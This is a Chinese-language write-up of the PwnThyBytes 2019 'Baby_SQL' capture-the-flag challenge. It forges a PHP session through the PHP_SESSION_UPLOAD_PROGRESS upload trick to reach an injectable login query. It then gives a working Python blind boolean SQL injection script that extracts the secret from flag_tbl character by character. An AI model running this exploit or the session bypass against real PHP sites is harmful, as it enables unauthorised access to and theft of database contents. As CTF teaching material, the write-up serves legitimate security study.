[PwnThyBytes——2019]Baby_SQL
ctrl+u最下面:
1
2
3
4
| </script>
</body>
</html>
|
下载发现/template目录下的漏洞:
1
2
3
4
5
| !isset($_SESSION) AND die("Direct access on this script is not allowed!");
include 'db.php';
$sql = 'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="' . $_GET['username'] . '" and password="' . md5($_GET['password']) . '";';
$result = $con->query($sql);
|
前提就是绕过这个isset($_SESSION),但是只有regieter和login有SESSION数组只有在session_start()初始化后才产生,所以只能伪造一个session来绕过index,进行sql注入。
在phpsession里如果在php.ini中设置session.auto_start=On,那么PHP每次处理PHP文件的时候都会自动执行session_start(),但是session.auto_start默认为Off。与Session相关的另一个叫session.upload_progress.enabled,默认为On,在这个选项被打开的前提下我们在multipart POST的时候传入PHP_SESSION_UPLOAD_PROGRESS,PHP会执行session_start()
这个方法同样可以用来进行文件包含和反序列化
直接脚本bp抓包:
1
2
3
4
5
6
7
8
9
| import requests
url = "http://6a742e0c-c6b0-49a3-b626-f5f0578d17f1.node3.buuoj.cn/templates/login.php"
files = {"file": "123456789"}
a = requests.post(url=url, files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"},
cookies={"PHPSESSID": "test1"}, params={'username': 'test', 'password': 'test'},
proxies={'http': "http://127.0.0.1:8080"})
print(a.text)
|
返回try again就差不多了
双引号闭合:
exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
| import requests
import time
url = "http://6a742e0c-c6b0-49a3-b626-f5f0578d17f1.node3.buuoj.cn/templates/login.php"
files = {"file": "123456789"}
'''字段值'''
flag=''
for i in range(1,100):
low = 32
high = 128
mid = (low+high)//2
while (low < high):
time.sleep(0.06)
payload_flag = {
'username': "test\" or (ascii(substr((select group_concat(secret) from flag_tbl ),{0},1))>{1}) #".format(i,mid),'password': 'test'}
r = requests.post(url=url,params=payload_flag,files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"},
cookies={"PHPSESSID": "test1"})
print(payload_flag)
if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text:
low = mid +1
else:
high = mid
mid = (low + high) // 2
if(mid==32 or mid == 132):
break
flag +=chr(mid)
print(flag)
print(flag)
|
参考链接:https://blog.csdn.net/SopRomeo/article/details/108967248
Author:
odiws
Permalink:
http://odiws.github.io/2024/10/15/PwnThyBytes%E2%80%94%E2%80%942019-Baby-SQL/
License:
Copyright (c) 2019 CC-BY-NC-4.0 LICENSE
Slogan:
Do you believe in DESTINY?